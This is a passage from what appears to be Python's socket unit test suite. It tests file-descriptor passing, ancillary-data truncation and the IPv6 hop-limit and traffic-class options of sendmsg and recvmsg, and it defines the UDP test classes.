            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            self.assertIsInstance(cmsg_data, bytes)
            # Each control message must carry a whole number of ints.
            self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
            fds.frombytes(cmsg_data)

        self.assertEqual(len(fds), numfds)
        self.checkFDs(fds)

    def testFDPassSimple(self):
        # Pass a single FD (array read from bytes object).
        self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testFDPassSimple(self):
        # Client: send one FD serialized with array.tobytes().
        self.assertEqual(
            self.sendmsgToServer(
                [MSG],
                [(socket.SOL_SOCKET,
                  socket.SCM_RIGHTS,
                  array.array("i", self.newFDs(1)).tobytes())]),
            len(MSG))

    def testMultipleFDPass(self):
        # Pass multiple FDs in a single array.
        self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testMultipleFDPass(self):
        self.createAndSendFDs(4)

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassCMSG_SPACE(self):
        # Test using CMSG_SPACE() to calculate ancillary buffer size.
        self.checkRecvmsgFDs(
            4, self.doRecvmsg(self.serv_sock, len(MSG),
                              socket.CMSG_SPACE(4 * SIZEOF_INT)))

    @testFDPassCMSG_SPACE.client_skip
    def _testFDPassCMSG_SPACE(self):
        self.createAndSendFDs(4)

    def testFDPassCMSG_LEN(self):
        # Test using CMSG_LEN() to calculate ancillary buffer size.
        self.checkRecvmsgFDs(1,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_LEN(4 * SIZEOF_INT)),
                             # RFC 3542 says implementations may set
                             # MSG_CTRUNC if there isn't enough space
                             # for trailing padding.
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassCMSG_LEN(self):
        self.createAndSendFDs(1)

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparate(self):
        # Pass two FDs in two separate arrays.  Arrays may be combined
        # into a single control message by the OS.
        self.checkRecvmsgFDs(2,
                             self.doRecvmsg(self.serv_sock, len(MSG), 10240),
                             maxcmsgs=2)

    @testFDPassSeparate.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    def _testFDPassSeparate(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd1]))]),
            len(MSG))

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparateMinSpace(self):
        # Pass two FDs in two separate arrays, receiving them into the
        # minimum space for two arrays.
        num_fds = 2
        self.checkRecvmsgFDs(num_fds,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_SPACE(SIZEOF_INT) +
                                            socket.CMSG_LEN(SIZEOF_INT * num_fds)),
                             maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)

    @testFDPassSeparateMinSpace.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    def _testFDPassSeparateMinSpace(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd1]))]),
            len(MSG))

    def sendAncillaryIfPossible(self, msg, ancdata):
        # Try to send msg and ancdata to server, but if the system
        # call fails, just send msg with no ancillary data.
        try:
            nbytes = self.sendmsgToServer([msg], ancdata)
        except OSError as e:
            # Check that it was the system call that failed
            self.assertIsInstance(e.errno, int)
            nbytes = self.sendmsgToServer([msg])
        self.assertEqual(nbytes, len(msg))

    @unittest.skipIf(sys.platform == "darwin", "see issue #24725")
    def testFDPassEmpty(self):
        # Try to pass an empty FD array.  Can receive either no array
        # or an empty array.
        self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240),
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassEmpty(self):
        self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
                                            socket.SCM_RIGHTS,
                                            b"")])

    def testFDPassPartialInt(self):
        # Try to pass a truncated FD array.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 1)
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            # Only a partial int may have arrived.
            self.assertLess(len(cmsg_data), SIZEOF_INT)

    def _testFDPassPartialInt(self):
        # Client: send an int array with its last byte chopped off.
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [self.badfd]).tobytes()[:-1])])

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassPartialIntInMiddle(self):
        # Try to pass two FD arrays, the first of which is truncated.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 2)
        fds = array.array("i")
        # Arrays may have been combined in a single control message
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            fds.frombytes(cmsg_data[:
                    len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.assertLessEqual(len(fds), 2)
        self.checkFDs(fds)

    @testFDPassPartialIntInMiddle.client_skip
    def _testFDPassPartialIntInMiddle(self):
        fd0, fd1 = self.newFDs(2)
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
             (socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd1]))])

    def checkTruncatedHeader(self, result, ignoreflags=0):
        # Check that no ancillary data items are returned when data is
        # truncated inside the cmsghdr structure.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

    def testCmsgTruncNoBufSize(self):
        # Check that no ancillary data is received when no buffer size
        # is specified.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
                                  # BSD seems to set MSG_CTRUNC only
                                  # if an item has been partially
                                  # received.
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTruncNoBufSize(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc0(self):
        # Check that no ancillary data is received when buffer size is 0.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTrunc0(self):
        self.createAndSendFDs(1)

    # Check that no ancillary data is returned for various non-zero
    # (but still too small) buffer sizes.

    def testCmsgTrunc1(self):
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))

    def _testCmsgTrunc1(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc2Int(self):
        # The cmsghdr structure has at least three members, two of
        # which are ints, so we still shouldn't see any ancillary
        # data.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 SIZEOF_INT * 2))

    def _testCmsgTrunc2Int(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Minus1(self):
        # One byte short of the smallest possible cmsg header.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 socket.CMSG_LEN(0) - 1))

    def _testCmsgTruncLen0Minus1(self):
        self.createAndSendFDs(1)

    # The following tests try to truncate the control message in the
    # middle of the FD array.

    def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
        # Check that file descriptor data is truncated to between
        # mindata and maxdata bytes when received with buffer size
        # ancbuf, and that any complete file descriptor numbers are
        # valid.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbuf)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

        if mindata == 0 and ancdata == []:
            # Implementations may drop the item entirely.
            return
        self.assertEqual(len(ancdata), 1)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.SOL_SOCKET)
        self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
        self.assertGreaterEqual(len(cmsg_data), mindata)
        self.assertLessEqual(len(cmsg_data), maxdata)
        fds = array.array("i")
        fds.frombytes(cmsg_data[:
                len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.checkFDs(fds)

    def testCmsgTruncLen0(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)

    def _testCmsgTruncLen0(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Plus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)

    def _testCmsgTruncLen0Plus1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
                                 maxdata=SIZEOF_INT)

    def _testCmsgTruncLen1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen2Minus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
                                 maxdata=(2 * SIZEOF_INT) - 1)

    def _testCmsgTruncLen2Minus1(self):
        self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
    # Test sendmsg() and recvmsg[_into]() using the ancillary data
    # features of the RFC 3542 Advanced Sockets API for IPv6.
    # Currently we can only handle certain data items (e.g. traffic
    # class, hop limit, MTU discovery and fragmentation settings)
    # without resorting to unportable means such as the struct module,
    # but the tests here are aimed at testing the ancillary data
    # handling in sendmsg() and recvmsg() rather than the IPv6 API
    # itself.

    # Test value to use when setting hop limit of packet
    hop_limit = 2

    # Test value to use when setting traffic class of packet.
    # -1 means "use kernel default".
    traffic_class = -1

    def ancillaryMapping(self, ancdata):
        # Given ancillary data list ancdata, return a mapping from
        # pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
        # Check that no (level, type) pair appears more than once.
        d = {}
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertNotIn((cmsg_level, cmsg_type), d)
            d[(cmsg_level, cmsg_type)] = cmsg_data
        return d

    def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
        # Receive hop limit into ancbufsize bytes of ancillary data
        # space.  Check that data is MSG, ancillary data is not
        # truncated (but ignore any flags in ignoreflags), and hop
        # limit is between 0 and maxhop inclusive.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        # Tell the client we are ready to receive ancillary data.
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbufsize)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

        self.assertEqual(len(ancdata), 1)
        self.assertIsInstance(ancdata[0], tuple)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
        self.assertIsInstance(cmsg_data, bytes)
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], maxhop)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testRecvHopLimit(self):
        # Test receiving the packet hop limit as ancillary data.
        self.checkHopLimit(ancbufsize=10240)

    @testRecvHopLimit.client_skip
    def _testRecvHopLimit(self):
        # Need to wait until server has asked to receive ancillary
        # data, as implementations are not required to buffer it
        # otherwise.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testRecvHopLimitCMSG_SPACE(self):
        # Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
        self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))

    @testRecvHopLimitCMSG_SPACE.client_skip
    def _testRecvHopLimitCMSG_SPACE(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    # Could test receiving into buffer sized using CMSG_LEN, but RFC
    # 3542 says portable applications must provide space for trailing
    # padding.  Implementations may set MSG_CTRUNC if there isn't
    # enough space for the padding.

    @requireAttrs(socket.socket, "sendmsg")
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSetHopLimit(self):
        # Test setting hop limit on outgoing packet and receiving it
        # at the other end.
        self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)

    @testSetHopLimit.client_skip
    def _testSetHopLimit(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                                   array.array("i", [self.hop_limit]))]),
            len(MSG))

    def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
                                     ignoreflags=0):
        # Receive traffic class and hop limit into ancbufsize bytes of
        # ancillary data space.  Check that data is MSG, ancillary
        # data is not truncated (but ignore any flags in ignoreflags),
        # and traffic class and hop limit are in range (hop limit no
        # more than maxhop).
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbufsize)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)
        self.assertEqual(len(ancdata), 2)
        ancmap = self.ancillaryMapping(ancdata)

        tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
        self.assertEqual(len(tcdata), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(tcdata)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)

        hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
        self.assertEqual(len(hldata), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(hldata)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], maxhop)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testRecvTrafficClassAndHopLimit(self):
        # Test receiving traffic class and hop limit as ancillary data.
        self.checkTrafficClassAndHopLimit(ancbufsize=10240)

    @testRecvTrafficClassAndHopLimit.client_skip
    def _testRecvTrafficClassAndHopLimit(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
        # Test receiving traffic class and hop limit, using
        # CMSG_SPACE() to calculate buffer size.
        self.checkTrafficClassAndHopLimit(
            ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)

    @testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
    def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket.socket, "sendmsg")
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSetTrafficClassAndHopLimit(self):
        # Test setting traffic class and hop limit on outgoing packet,
        # and receiving them at the other end.
        self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                          maxhop=self.hop_limit)

    @testSetTrafficClassAndHopLimit.client_skip
    def _testSetTrafficClassAndHopLimit(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                                   array.array("i", [self.traffic_class])),
                                  (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                                   array.array("i", [self.hop_limit]))]),
            len(MSG))

    @requireAttrs(socket.socket, "sendmsg")
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testOddCmsgSize(self):
        # Try to send ancillary data with first item one byte too
        # long.  Fall back to sending with correct size if this fails,
        # and check that second item was handled correctly.
        self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                          maxhop=self.hop_limit)

    @testOddCmsgSize.client_skip
    def _testOddCmsgSize(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        try:
            nbytes = self.sendmsgToServer(
                [MSG],
                [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                  array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
                 (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                  array.array("i", [self.hop_limit]))])
        except OSError as e:
            # Check that it was the system call that failed
            self.assertIsInstance(e.errno, int)
            nbytes = self.sendmsgToServer(
                [MSG],
                [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                  array.array("i", [self.traffic_class])),
                 (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                  array.array("i", [self.hop_limit]))])
        self.assertEqual(nbytes, len(MSG))

    # Tests for proper handling of truncated ancillary data

    def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
        # Receive hop limit into ancbufsize bytes of ancillary data
        # space, which should be too small to contain the ancillary
        # data header (if ancbufsize is None, pass no second argument
        # to recvmsg()).  Check that data is MSG, MSG_CTRUNC is set
        # (unless included in ignoreflags), and no ancillary data is
        # returned.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.misc_event.set()
        args = () if ancbufsize is None else (ancbufsize,)
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), *args)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testCmsgTruncNoBufSize(self):
        # Check that no ancillary data is received when no ancillary
        # buffer size is provided.
        self.checkHopLimitTruncatedHeader(ancbufsize=None,
                                          # BSD seems to set
                                          # MSG_CTRUNC only if an item
                                          # has been partially
                                          # received.
                                          ignoreflags=socket.MSG_CTRUNC)

    @testCmsgTruncNoBufSize.client_skip
    def _testCmsgTruncNoBufSize(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc0(self):
        # Check that no ancillary data is received when ancillary
        # buffer size is zero.
        self.checkHopLimitTruncatedHeader(ancbufsize=0,
                                          ignoreflags=socket.MSG_CTRUNC)

    @testSingleCmsgTrunc0.client_skip
    def _testSingleCmsgTrunc0(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    # Check that no ancillary data is returned for various non-zero
    # (but still too small) buffer sizes.

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc1(self):
        self.checkHopLimitTruncatedHeader(ancbufsize=1)

    @testSingleCmsgTrunc1.client_skip
    def _testSingleCmsgTrunc1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc2Int(self):
        self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)

    @testSingleCmsgTrunc2Int.client_skip
    def _testSingleCmsgTrunc2Int(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTruncLen0Minus1(self):
        self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)

    @testSingleCmsgTruncLen0Minus1.client_skip
    def _testSingleCmsgTruncLen0Minus1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTruncInData(self):
        # Test truncation of a control message inside its associated
        # data.  The message may be returned with its data truncated,
        # or not returned at all.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(
            self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

        self.assertLessEqual(len(ancdata), 1)
        if ancdata:
            cmsg_level, cmsg_type, cmsg_data = ancdata[0]
            self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
            self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
            self.assertLess(len(cmsg_data), SIZEOF_INT)

    @testSingleCmsgTruncInData.client_skip
    def _testSingleCmsgTruncInData(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
        # Receive traffic class and hop limit into ancbufsize bytes of
        # ancillary data space, which should be large enough to
        # contain the first item, but too small to contain the header
        # of the second.  Check that data is MSG, MSG_CTRUNC is set
        # (unless included in ignoreflags), and only one ancillary
        # data item is returned.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbufsize)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

        self.assertEqual(len(ancdata), 1)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        # Which of the two items survives is implementation-dependent.
        self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)

    # Try the above test with various buffer sizes.

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc0(self):
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
                                        ignoreflags=socket.MSG_CTRUNC)

    @testSecondCmsgTrunc0.client_skip
    def _testSecondCmsgTrunc0(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc1(self):
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)

    @testSecondCmsgTrunc1.client_skip
    def _testSecondCmsgTrunc1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc2Int(self):
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                        2 * SIZEOF_INT)

    @testSecondCmsgTrunc2Int.client_skip
    def _testSecondCmsgTrunc2Int(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncLen0Minus1(self):
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                        socket.CMSG_LEN(0) - 1)

    @testSecondCmsgTruncLen0Minus1.client_skip
    def _testSecondCmsgTruncLen0Minus1(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)

    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecomdCmsgTruncInData(self):
        # NOTE(review): "Secomd" is a historical typo for "Second";
        # renaming would have to keep the test/_test name pairing in sync.
        # Test truncation of the second of two control messages inside
        # its associated data.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(
            self.serv_sock, len(MSG),
            socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)

        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

        cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}

        cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        # remove() also asserts each type appears at most once.
        cmsg_types.remove(cmsg_type)
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)

        if ancdata:
            cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
            self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
            cmsg_types.remove(cmsg_type)
            self.assertLess(len(cmsg_data), SIZEOF_INT)

        self.assertEqual(ancdata, [])

    @testSecomdCmsgTruncInData.client_skip
    def _testSecomdCmsgTruncInData(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
# Derive concrete test classes for different socket types.

class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
                             SendrecvmsgConnectionlessBase,
                             ThreadedSocketTestMixin, UDPTestBase):
    # Combines the datagram sendmsg/recvmsg mixins with an IPv4 UDP
    # socket pair; the concrete classes below add the actual tests.
    pass

@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
    # sendmsg() tests over IPv4 UDP.
    pass

@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
    # recvmsg() tests over IPv4 UDP.
    pass

@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
    # recvmsg_into() tests over IPv4 UDP.
    pass
